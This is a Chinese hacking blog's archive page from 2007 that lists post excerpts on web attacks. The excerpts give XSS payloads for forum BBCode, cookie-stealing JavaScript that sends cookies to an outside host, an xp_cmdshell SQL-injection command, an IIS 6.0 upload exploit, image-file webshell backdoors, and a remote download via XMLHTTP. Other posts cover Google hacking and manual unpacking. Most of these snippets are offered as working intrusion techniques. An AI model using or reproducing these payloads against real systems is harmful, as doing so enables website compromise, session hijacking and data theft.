2007年6月19日
摘要: 1、显示,help/h_main.htm的内容,格式:http://test/blog/user_help.asp?file=help/h_whatblog.htm,如果换成asp文件是不是也可以显示?从代码中可以看出,不允许读扩展名为asp的文件,但是对别扩展名没有限制,我们只想要asp文件的内容,windowns不区分文件的大小写,我们把小写的asp换成大写的ASP,读取oBlog的数据库连接... 阅读全文
posted @ 2007-06-19 10:09 %5C 阅读(807) 评论(0) 推荐(0) 编辑
  2007年6月18日
摘要: read()){ if((is_dir("$directory/$file")) && ($file!=".") && ($file!="..")) { tree("$directory/$file"); } else{ if($file != "." && $file != ".."&&eregi(".php",$file)){ $fd=r... 阅读全文
posted @ 2007-06-18 09:12 %5C 阅读(256) 评论(0) 推荐(0) 编辑
摘要: PW论坛的FONT FACE字体没过滤: 跨站代码: 以下是代码片段:[font=expression(alert('XSS'))]xss[/font] DZ论坛的float浮动属性没过滤: 跨站代码 : 以下是代码片段:[float=expression(a... 阅读全文
posted @ 2007-06-18 09:06 %5C 阅读(294) 评论(0) 推荐(0) 编辑
  2007年6月16日
摘要: 1.前言在论坛上看到很多朋友,不知道什么是ESP定律,ESP的适用范围是什么,ESP定律的原理是什么,如何使用ESP定律?看到了我在http://poptown.gamewan.com/dispbbs.asp?boardID=5&ID=54&page=1调查结果发现,大家对ESP定律很感兴趣,当然因为实在是太好用了,现在我就来告诉大家什么是ESP定律,它的原理是什么!!BTW:在看完了手动脱壳入门... 阅读全文
posted @ 2007-06-16 16:36 %5C 阅读(631) 评论(1) 推荐(0) 编辑
摘要: 2004年在拉斯维加斯举行的BlackHat大会上,有两位安全专家分别作了名为You found that on google? 和google attacks 的主题演讲。经过安全焦点论坛原版主WLJ翻译整理后,个人觉得有必要补充完善一些细节部分。今天向大家讲述的是Google的又一功能:利用搜索引擎快速查找存在脆弱性的主机以及包含敏感数据的信息,甚至可以直接进行傻瓜入侵。 用google来... 阅读全文
posted @ 2007-06-16 16:23 %5C 阅读(463) 评论(0) 推荐(0) 编辑
  2007年6月12日
摘要: 首先偷取Cookie,通过以下脚本引入一个js,document.write(""),然后js内容为: var code; var target = "http://www.loveshell.net/cookie.asp?"; info=escape(document.location+"@@@"+document.cookie); target=target+info; co... 阅读全文
posted @ 2007-06-12 09:18 %5C 阅读(299) 评论(0) 推荐(0) 编辑
  2007年6月11日
摘要: http://www.xssed.com/archive/special=1/ 阅读全文
posted @ 2007-06-11 16:46 %5C 阅读(624) 评论(0) 推荐(0) 编辑
摘要: 我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'建立虚拟目录win,... 阅读全文
posted @ 2007-06-11 16:44 %5C 阅读(251) 评论(0) 推荐(0) 编辑
摘要: JUST,DO.IT!I LOVE HACKED DOWN WEBSITE. This is BUG Only For > IIS 6.0 (Windows 2003 ) EXPLIOT: HTTP://WWW.****.COM/(UPLOAD.ASP) You can change upload is filepath…. -_-!! (exmple:upload/*.gif) changed... 阅读全文
posted @ 2007-06-11 16:43 %5C 阅读(242) 评论(0) 推荐(0) 编辑
摘要: 1.一句话 2.图片后门copy *.gif /b + 网马.asp /a Google.gif然后建个ASP文件 !–#include file=”Google.jpg”–注意路径 3.Microsoft.XMLHTTP下载Set xPost = CreateObject("Microsoft.XMLHTTP")xPost.Open "GET","http://xxx/*.txt",F... 阅读全文
posted @ 2007-06-11 16:42 %5C 阅读(228) 评论(0) 推荐(0) 编辑